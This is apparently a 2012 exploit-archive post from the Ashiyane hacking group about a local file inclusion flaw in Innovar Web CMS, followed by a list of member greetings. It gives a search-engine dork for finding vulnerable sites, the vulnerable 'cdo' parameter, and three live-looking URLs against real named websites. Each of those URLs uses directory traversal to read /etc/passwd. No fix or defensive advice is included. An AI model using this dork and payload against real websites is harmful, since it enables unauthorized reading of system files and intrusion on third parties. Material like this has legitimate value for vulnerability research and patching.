-=-=-=-=-=- In The Name Of God -=-=-=-=-=-
--------------------------------------------------------------------------------
@ Innovar Web CMS Local File Inclusion Vulnerbility
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
# Name:Innovar Web CMS Local File Inclusion Vulnerbility
# Vendor: http://www.innovarweb.com.ar/
# Date: 2012-10-22
# Author: Ashiyane Digital Security Team
# Thanks to: 1337day.com,cxsecurity.com,packetstormsecurity.org
# Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Desarrollado por Innovar Web"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerability ~>
[+] Vulnerability: http://127.0.0.1/path/index.php?cdo=[Include]
[+] Demo(s) :
[+] http://www.westingcapitalinc.com/index.php?cdo=../../../../../../etc/passwd
[+] http://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd
[+] http://www.ojalatesirva.com.ar/interior/index.php?cdo=../../../../../../etc/passwd
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ Behrooz_Ice,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ PrinceOfHacking,elvator,unique2world,HidDeEn,Encoder,N4H,Classic,Zend
@ Angel--D3m0n,Azad™,HashoR,Pr0grammer,Unline
And All Ashiyane Bug ResearcherS
===========================================================================
ASHIYANE DIGITAL SECURITY TEAM
Persian Gulf F0r Ever
WE LOVE IRAN
<<./By MojiRider >>